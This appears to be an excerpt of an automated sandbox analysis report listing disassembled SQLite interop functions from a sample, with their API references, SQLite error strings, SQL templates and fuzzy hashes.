                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I46481015c7f49c68.I950480ab972e108d.I9c6d7cd7b7d38055.Ibff6307869d58daf.$Ifc350ae509dc2b53.
                                                                                      • String ID: 0rPl$SELECT %s
                                                                                      • API String ID: 2869297011-886321376
                                                                                      • Opcode ID: 62e94634e819426f160022ebd715f952da52966ffaa4a2efb40addfc0d3df707
                                                                                      • Instruction ID: f22a6c4b0130b36e1794f548588c072a7fd593b41c41630e57363d67ae93bf9c
                                                                                      • Opcode Fuzzy Hash: 62e94634e819426f160022ebd715f952da52966ffaa4a2efb40addfc0d3df707
                                                                                      • Instruction Fuzzy Hash: A4D16471A083019FC310CF28C881E5BBBE5BF8835AF140A2DF999A7751D775E9458BE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C420760 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C420926
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,no such schema,?), ref: 6C420931
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                                                      • API String ID: 1339256467-1499782803
                                                                                      • Opcode ID: 37f537109d96e3f5da90b91bc467f9f379c7ef8d991bd4a637aa67f0b1c25195
                                                                                      • Instruction ID: fb0adfa3c4e492271f918e6915c5d4d859d2b391dcf115f07ceb96844b0d066c
                                                                                      • Opcode Fuzzy Hash: 37f537109d96e3f5da90b91bc467f9f379c7ef8d991bd4a637aa67f0b1c25195
                                                                                      • Instruction Fuzzy Hash: AA51B7316012849BD700CF18C8A2F6AB7E1AFC5319F254559EC999BB11DB35EC46CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4226B0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 142COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C447230: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000292EE,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C447263
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023562,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C422808
                                                                                        • Part of subcall function 6C447230: SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C447345
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00023562,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C42282F
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$Ifc350ae509dc2b53.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse$rtree$rtree_i32$rtreecheck$rtreedepth$rtreenode
                                                                                      • API String ID: 326662961-2637365468
                                                                                      • Opcode ID: 8c9ff80318f16206aac66b8598bac952fbf7e00962ac74c1f0a6c465d1edb0d0
                                                                                      • Instruction ID: 616ac5b183f958d8f42d6f5dc1bf55943e65cbea8d5b0e5daa69084cfb207af6
                                                                                      • Opcode Fuzzy Hash: 8c9ff80318f16206aac66b8598bac952fbf7e00962ac74c1f0a6c465d1edb0d0
                                                                                      • Instruction Fuzzy Hash: 80314AB0B1469023FF24D6261C0BF5B214A4BC1B2EF144438F95AEBFC2EE68D50182D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F42E0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6C3F43D1
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F69,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C3F43EF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$invalid$misuse$unopened
                                                                                      • API String ID: 1952225102-2128748777
                                                                                      • Opcode ID: 512b3e629be972d4e402209ed99f577bf767ac8c9516a64c20eea3890cccb015
                                                                                      • Instruction ID: d56e264c77d108d10198d0b418d25b096f4792a4da3682d3bacfd2e730f3663e
                                                                                      • Opcode Fuzzy Hash: 512b3e629be972d4e402209ed99f577bf767ac8c9516a64c20eea3890cccb015
                                                                                      • Instruction Fuzzy Hash: 64413971B001149BC700DF58DD40F9ABBF5EBC4328F148AAAE92C9B701E771D8528BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4B4840 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with finalized prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4875
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4B49A2
                                                                                      • API called with finalized prepared statement, xrefs: 6C4B486E
                                                                                      • API called with NULL prepared statement, xrefs: 6C4B484B
                                                                                      • misuse, xrefs: 6C4B499D
                                                                                      • bind on a busy prepared statement: [%s], xrefs: 6C4B4984
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4B485A, 6C4B488A, 6C4B4993
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$bind on a busy prepared statement: [%s]$misuse
                                                                                      • API String ID: 1952225102-2531267497
                                                                                      • Opcode ID: b5d070c939b884643c622328f7f6103bdeeb5b8b306952c4e55569fded98fa43
                                                                                      • Instruction ID: 57f6df28d9591e07e9808acf7ebdb6c98bc79b7aa2690709c6389d53de22a682
                                                                                      • Opcode Fuzzy Hash: b5d070c939b884643c622328f7f6103bdeeb5b8b306952c4e55569fded98fa43
                                                                                      • Instruction Fuzzy Hash: E141F3357016469BEB04DF78DC80F86B761BB8039AF10153AE224ABF81D731E426C7E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C430100 Relevance: 16.9, APIs: 11, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,00000000,00000248), ref: 6C430161
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,?,?,?,00000001,?,?,00000000,00000248), ref: 6C43016E
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000002,?,?,?,00000001,?,?,00000000,00000248), ref: 6C430174
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000248), ref: 6C430188
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(?,00000002,?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000248), ref: 6C430198
                                                                                      • SId99ac2a61d035e11.SQLITE.INTEROP(?,00000004), ref: 6C4301F1
                                                                                      • SIbc9b0b73a965892b.SQLITE.INTEROP(?,00000004,?,00000004), ref: 6C4301FF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?), ref: 6C4302E6
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C4302F7
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C430553
                                                                                        • Part of subcall function 6C4358B0: SI1ae480d1861ed022.SQLITE.INTEROP(6C42BA60,?,00000000,?,?,?,00000000,?,?,00000000,?,?,?,?,6C43F3D9,?), ref: 6C4358DF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,00000000), ref: 6C430541
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I46481015c7f49c68.I950480ab972e108d.If8364af380546f2d.$I1ae480d1861ed022.I1c7a7970970b9619.I9c6d7cd7b7d38055.Ibc9b0b73a965892b.Id99ac2a61d035e11.
                                                                                      • String ID:
                                                                                      • API String ID: 4143488256-0
                                                                                      • Opcode ID: 090a2d18dbb5e2f7eaab8a7b3c72087ea1bb47d9975c7fc72663446d7c2cd07f
                                                                                      • Instruction ID: 66da5c7fe185e167544dc7fb29e797eccc9bbdf915a8de21a77cc2fadc74e5be
                                                                                      • Opcode Fuzzy Hash: 090a2d18dbb5e2f7eaab8a7b3c72087ea1bb47d9975c7fc72663446d7c2cd07f
                                                                                      • Instruction Fuzzy Hash: 24E16AB1A083519FD700CF1AC880E9BB7F5BFC8358F045A2DE89997710E731E9498B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42A930 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 416COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C42AB5A
                                                                                      • SI633e1c91fb9a8aa1.SQLITE.INTEROP(?,00000000), ref: 6C42ABDF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000), ref: 6C42ABE5
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C42AE68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I633e1c91fb9a8aa1.I943321d364f02e5d.
                                                                                      • String ID: %d %d %d %d $string or blob too big
                                                                                      • API String ID: 1980446631-3700455065
                                                                                      • Opcode ID: e060dfd14fe3398fe0ce4609f1caafa84c30cc0d945ef497520eed8e1c2a790e
                                                                                      • Instruction ID: 4a87022adb8ab7b540b3ffe08d14c898c339aa23bed83052fa42e68566813866
                                                                                      • Opcode Fuzzy Hash: e060dfd14fe3398fe0ce4609f1caafa84c30cc0d945ef497520eed8e1c2a790e
                                                                                      • Instruction Fuzzy Hash: C2F167B19083018FD710CF29C881E9ABBF5BF88318F144A6DF99897750E775E949CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C418470 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 318COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,?,00000001,00000000,00000000,00000000,00000000), ref: 6C4184FE
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,00000000,00000000,00000000), ref: 6C418511
                                                                                      • SIf216ef3874529d42.SQLITE.INTEROP(00000000,?,?,00000000,00000000,00000000), ref: 6C41852C
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4186A1
                                                                                      • misuse, xrefs: 6C41869C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C418692
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.If216ef3874529d42.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 3961920113-1203237178
                                                                                      • Opcode ID: 4f990a97f61f3040d2cd4de3ed601b35c9452974888470ee2bfc27c6a611739c
                                                                                      • Instruction ID: 3513c997d1740a0d40175f316c242ee8e5a4663b28ed185128e203421c37f15a
                                                                                      • Opcode Fuzzy Hash: 4f990a97f61f3040d2cd4de3ed601b35c9452974888470ee2bfc27c6a611739c
                                                                                      • Instruction Fuzzy Hash: 28A1CE71B083019BD710CE1ADC80F7AB3E5EB8432DF144A3EE99982F41E735D859C692
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C400480 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1,?,?,00000000,?,?,?,?,00000000,?,00000001), ref: 6C4004D4
                                                                                        • Part of subcall function 6C4033C0: SIfc350ae509dc2b53.SQLITE.INTEROP(6C4004E7,?,?,?,6C4004E7,00000000,?,?,?,00000000,?,?,?,?,00000000,?), ref: 6C4033F3
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(00000000,00000001,?,?,00000000,?,?,?,?,00000000,?,00000001), ref: 6C400502
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,00000000,?,?,?,?,00000000), ref: 6C400526
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 6C400593
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(00000000,00000000,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 6C4005A3
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C40051F
                                                                                      • misuse, xrefs: 6C40051A
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C400510
                                                                                      • SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1, xrefs: 6C4004CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I1c7a7970970b9619.I46481015c7f49c68.I9c6d7cd7b7d38055.Ibff6307869d58daf.Ifc350ae509dc2b53.
                                                                                      • String ID: %s at line %d of [%.10s]$SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 4086044065-3890968032
                                                                                      • Opcode ID: 59af3a5d14621d8c0aade7e64dabf7318bbf913124ee51abecb977f613c5a441
                                                                                      • Instruction ID: c587a014967d0e4a5061bbed1b9b661a43e445facef5c9b301f18a3ff018f930
                                                                                      • Opcode Fuzzy Hash: 59af3a5d14621d8c0aade7e64dabf7318bbf913124ee51abecb977f613c5a441
                                                                                      • Instruction Fuzzy Hash: 6B519BB1B403419BDB00DF29D885F5BB7E6AF84319F04893DE8598BB41E771E918CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3FE490 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?),?,?,00000000,?,?,?,?,?,?,6C3FE286,00000000,?), ref: 6C3FE53A
                                                                                        • Part of subcall function 6C4033C0: SIfc350ae509dc2b53.SQLITE.INTEROP(6C4004E7,?,?,?,6C4004E7,00000000,?,?,?,00000000,?,?,?,?,00000000,?), ref: 6C4033F3
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(00000000,00000001,?,?,00000000,?,?,?,?,?,?,6C3FE286,00000000,?), ref: 6C3FE566
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C3FE58D
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000), ref: 6C3FE5FC
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C3FE586
                                                                                      • misuse, xrefs: 6C3FE581
                                                                                      • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 6C3FE535
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C3FE577
                                                                                      • , xrefs: 6C3FE643
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I1c7a7970970b9619.I46481015c7f49c68.I9c6d7cd7b7d38055.Ifc350ae509dc2b53.
                                                                                      • String ID: $%s at line %d of [%.10s]$REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 2163473777-1530370596
                                                                                      • Opcode ID: 26547c61ac0a130badef296f2dca22516cab002c1a9e092bb36637fa63a3e1ab
                                                                                      • Instruction ID: fa98fbd3c55e4c850013fdd5ca65ffec294e2149f5a3d0a47c49d8679e3ba52f
                                                                                      • Opcode Fuzzy Hash: 26547c61ac0a130badef296f2dca22516cab002c1a9e092bb36637fa63a3e1ab
                                                                                      • Instruction Fuzzy Hash: 5C518EB1A043018FDB04DF29C884A5AB7E5BF88348F144A2DE569DB751E731D915CFD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3FA9D0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s_data$CREATE TABLE %Q.'%q_%q'(%s)%s$data$fts5: error creating shadow table %q_%s: %s$id INTEGER PRIMARY KEY, block BLOB$idx$segid, term, pgno, PRIMARY KEY(segid, term)
                                                                                      • API String ID: 0-688615114
                                                                                      • Opcode ID: b9d7063005e81aa13bb306f48fcceef8433fb9a9789dbda0a66cc13b3c45dbb8
                                                                                      • Instruction ID: c82f5f3cb57014eaeed0ed542e8d933687d87662cfef46418ceeb375ceab4d04
                                                                                      • Opcode Fuzzy Hash: b9d7063005e81aa13bb306f48fcceef8433fb9a9789dbda0a66cc13b3c45dbb8
                                                                                      • Instruction Fuzzy Hash: E131D271640201AFDB118F15CD40F9AB7E5AF84358F058928FD68ABB50E775DC0A8FE2
